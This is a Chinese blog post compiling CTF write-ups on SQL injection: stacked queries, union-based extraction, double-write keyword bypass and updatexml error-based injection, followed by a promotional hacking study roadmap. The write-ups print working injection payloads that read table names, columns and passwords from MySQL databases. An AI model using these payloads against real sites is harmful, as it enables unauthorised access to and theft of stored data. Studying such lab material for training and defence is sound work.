CTF Web SQL注入专项整理（持续更新中）_ctf sql注入(1)

安卓开发top

于 2024-04-07 16:37:28 发布

阅读量1k

点赞数 28

分类专栏： 2024年程序员学习文章标签：前端 sql 数据库

本文链接：https://blog.csdn.net/m0_61072747/article/details/137468995

版权

2024年程序员学习专栏收录该内容

295 篇文章 0 订阅

订阅专栏

参考：https://blog.csdn.net/qq_44657899/article/details/10323914

回显flag：

第三种解法 handler代替select

select命令被过滤了怎么办？我们还可以用handler命令进行查看，handler命令可以一行一行的显示数据表中的内容。
构造payload：
1'; handler 1919810931114514open asa; handler a read next;#

handler代替select，以一行一行显示内容
open打开表
as更改表的别名为a
read next读取数据文件内的数据次数

上传payload，回显flag：

原文链接：https://blog.csdn.net/m0_73734159/article/details/134049744?spm=1001.2014.3001.5501

数字型注入和堆叠查询手法原理

【例题】[SUCTF 2019]EasySQL 1

题目环境：

把你的旗子给我，我会告诉你旗子是不是对的。

判断注入类型
1'
回显结果

不是字符型SQL注入

1
回显结果

数字型SQL注入

查所有数据库,采用堆叠注入
1;show databases;

查看所有数据表
1;show tables;

尝试爆Flag数据表的字段
1;show columns from Flag;

回显错误

到这里，大佬们直接猜出了后端语句
select $_GET['query'] || flag from Flag
我直接好家伙，大佬果然是大佬
||就是SQL里面的逻辑或运算符

第一种解法添加新列绕过逻辑或运算符：

***,1**
那么传到后端语句就是
select *,1 || flag from Flag
这里我问了下文心一言，看完我也理解了

这段SQL代码的含义是：从Flag表中选择所有的列，以及由列flag的值与数字1进行连接生成的新列。
具体来说：
select *：选择所有的列。
1 || flag：这是SQL中的字符串连接操作。它将数字1与flag列的值进行连接。对于每一行，都会生成一个新的字符串，这个字符串是数字1后跟着flag列的值。如果flag列的值本身是一个字符串，那么这两个字符串将被连接起来。
from Flag：从Flag表中选择数据。
因此，这段代码的输出结果将包含Flag表的所有列，以及一个名为“1”的列，该列的值是flag列的值与数字1的连接。

大致意思，就是查看数据表Flag的所有列内容，然后添加了一个由列flag的值与数字1进行连接生成的新列，这个新的列名就叫1，那么猜测或者说就是flag被过滤，我们还能查到flag列的值，因为flag的值复制到了新的列1。
*,0

可以明显看到新的列名0和flag的值连接起来了
*,1

对吧，新列名为1
*,2

还是为1，所有还可以看出Flag数据表的列只能是两个

第二种解法改逻辑或运算符为字符串连接符：

既然题目内置的是逻辑或运算符，那咱们直接把它改成字符串连接符不就好了嘛（滑稽）
使用set方法定义sql_mode参数设置，PIPES_AS_CONCAT字符串连接符select 1查询第一列
1;set sql_mode=PIPES_AS_CONCAT;select 1
回显结果：

可以明显看出解法1和解法2的回显结果有明显不同
原文链接：https://blog.csdn.net/m0_73734159/article/details/134142483?spm=1001.2014.3001.5501

字符型注入和联合查询手法原理（常见注入手法）

【例题】[极客大挑战 2019]LoveSQL 1

题目环境：

判断注入类型

是否为数字型注入

admin
1

回显结果

否

是否为字符型注入

admin
1'

回显结果

是

判断注入手法类型

使用堆叠注入
采用密码参数进行注入

爆数据库
1'; show database();#
回显结果

这里猜测注入语句某字段被过滤，或者是’;'被过滤导致不能堆叠注入

爆字段数
1';order by 4#
回显结果

报错
抛弃堆叠注入

步入正题

1' order by 4#
回显结果

成功，但是不存在第4列
同时验证了猜想不能使用堆叠注入

继续判断列数
1' order by 3#

可知列数只有3列

爆数据库
使用联合查询
1' union select 1,2,database()#

爆数据表
1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()#
回显结果

爆出两个表
开始爆数据表的字段
按照先后顺序把，先爆第一个

爆geekuser数据表的字段
1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='geekuser'#
回显结果

字段：id、username、password

爆geekuser数据表的所有内容
1' union select 1,database(),group_concat(id,username,password) from geekuser#
回显结果

无flag

转手数据表l0ve1ysq1
步骤和数据表geekuser一样，这里直接爆数据表l0ve1ysq1的flag值
1' union select 1,database(),group_concat(password) from l0ve1ysq1#
回显结果

得出flag：
flag{3c4b1ff9-6685-4dcb-853e-06093c1e4040}
原文链接：https://blog.csdn.net/m0_73734159/article/details/134185235?spm=1001.2014.3001.5501

双写绕过原理

【例题】[极客大挑战 2019]BabySQL 1

题目环境：

作者已经描述进行了严格的过滤
做好心理准备进行迎接

判断注入类型

admin
1’

字符型注入

万能密码注入

admin
1’ or ‘1’='1

报错

已经是字符型注入了，所以的话只有or这里存在了过滤
联想到buuctf里面还没有碰到双写绕过的题目
所以这里斗胆试一下使用双写绕过

1' oorr '1'='1
成功

使用堆叠注入爆数据库
1';show database();
报错

抛弃堆叠注入
尝试联合注入

联合注入末尾需要使用#号键进行注释#号后面的命令，避免报错

这里值得提一下schema和schemata和常见命令的理解

SCHEMA在MySQL中是数据库，SCHEMATA表用来提供有关数据库的信息。
union select就是联合注入，联合查询的意思
from来自
information_schema是MySQL自带的数据库
group_concat将值连接起来
where来自那个数据库或数据表等等

爆列数(关键命令采用双写进行绕过）
1' oorrder bbyy 4#

1' oorrder bbyy 3#

可知列数只有3列

查位(关键命令采用双写进行绕过）
1' ununionion seselectlect 1,2,3#

爆数据库(关键命令采用双写进行绕过）
1' ununionion seselectlect 1,database(),3#

采用第三列进行注入
爆所有数据库(关键命令采用双写进行绕过）
1' ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata#

根据常识ctf数据库里面存在flag的可能更大，故选择ctf数据库

爆ctf数据库里面的数据表
1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf'#

因为ctf在schema里面所有这里就是table_schema，schema里面的数据库ctf里面的数据表

得到Flag数据表

爆Flag数据表里面的字段
1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='Flag'#
得到flag字段

爆flag字段内容
1' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag#

ctf.Flag意思就是ctf数据库里面的Flag数据表

得到flag：
flag{fbd18420-cab7-4d6e-8fb9-f8ea6febda61}
原文链接：https://blog.csdn.net/m0_73734159/article/details/134277587?spm=1001.2014.3001.5502

报错注入原理

【例题】非常经典的一道SQL报错注入题目[极客大挑战 2019]HardSQL 1（两种解法！）

题目环境：

没错，又是我，这群该死的黑客竟然如此厉害，所以我回去爆肝SQL注入，这次，再也没有人能拿到我的flag了
做了好多这个作者出的题了，看来又要上强度了

判断注入类型

username：admin
password：1
这里把参数password作为注入点

1'

单引号的字符型注入

万能密码注入
1' or '1'='1

万能密码注入被链接
猜测某些字符或者关键字被过滤

SQL注入字典查过滤字符

Intruder字典爆破

光标选中参数password的值1-Add选择爆破目标
选用字典

Start attack开始爆破

OK

爆破结果：

741为过滤内容
可以看到很多字符=、–+、/**/和一些注入命令union、by、‘1’='1等被过滤

继续测试

admin
1’ or

可以看到被拦截了
通过刚才的字典爆破，可以知道1’和or是没有被过滤的
那么真相只有一个，卧槽，空格被过滤了，我直呼好家伙

刚开始本想尝试编码绕过空格，结果不行，这里猜测到了空格限制

空格限制

admin
1’(or)

like没有被过滤，使用like可以绕过=号，like <=> =

重新构造万能密码
1'or((1)like(1))#

可以看到绕过了空格限制
同时也登陆成功了
然后想到了之前做过很类似的一道题
SQL报错注入也用到了空格限制
（已经试了堆叠注入和联合注入都不行）
这里就索性试一下SQL报错注入

知识一、

SQL报错注入常用函数

两个基于XPAT（XML)的报错注入函数
函数updatexml() 是mysql对xml文档数据进行查询和修改的xpath函数
函数extractvalue() 是mysql对xml文档数据进行查询的xpath函数
注入原理：
（在使用语句时，如果XPath_string不符合该种类格式，就会出现格式错误，并且会以系统报错的形式提示出错误！）
（局限性查询字符串长度最大为32位，要突破此限制可使用right(),left()，substr()来截取字符串）

其它
函数floor() mysql中用来取整的函数
函数exp() 此函数返回e(自然对数的底)指数X的幂值的函数

首先使用updatexml()函数进行SQL报错注入
爆库
1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

得到库名geek

查表
1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）

如何自学黑客&网络安全

黑客零基础入门学习路线&规划

初级黑客
1、网络安全理论知识（2天）
①了解行业相关背景，前景，确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。（非常重要）

2、渗透测试基础（一周）
①渗透测试的流程、分类、标准
②信息收集技术：主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF）、绕过IDS和反病毒侦察
④主机攻防演练：MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础（一周）
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全（系统入侵排查/系统加固基础）

4、计算机网络基础（一周）
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析（HTTP、TCP/IP、ARP等）
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御：主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作（2天）
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透（1周）
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具：Nmap、BurpSuite、SQLMap、其他（菜刀、漏扫等）
恭喜你，如果学到这里，你基本可以从事一份网络安全相关的工作，比如渗透测试、Web 渗透、安全服务、安全分析等岗位；如果等保模块学的好，还可以从事等保工程师。薪资区间6k-15k

到此为止，大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗？

如果你想要入坑黑客&网络安全，笔者给大家准备了一份：282G全网最全的网络安全资料包评论区留言即可领取！

7、脚本编程（初级/中级/高级）
在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时候，往往需要对现有工具进行扩展，或者编写符合我们要求的工具、自动化脚本，这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中，想要高效地使用自制的脚本工具来实现各种目的，更是需要拥有编程能力.

如果你零基础入门，笔者建议选择脚本语言Python/PHP/Go/Java中的一种，对常用库进行编程学习；搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP， IDE强烈推荐Sublime；·Python编程学习，学习内容包含：语法、正则、文件、网络、多线程等常用库，推荐《Python核心编程》，不要看完；·用Python编写漏洞的exp,然后写一个简单的网络爬虫；·PHP基本语法学习并书写一个简单的博客系统；熟悉MVC架构，并试着学习一个PHP框架或者Python框架 (可选)；·了解Bootstrap的布局或者CSS。

8、超级黑客
这部分内容对零基础的同学来说还比较遥远，就不展开细说了，附上学习路线。